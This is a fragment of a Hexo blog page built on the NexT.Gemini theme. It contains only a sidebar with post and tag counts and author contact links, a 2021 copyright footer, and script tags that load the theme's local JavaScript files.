</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/songshangru" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;songshangru" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:948249890@qq.com" title="E-Mail → mailto:948249890@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Hyacinthum</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
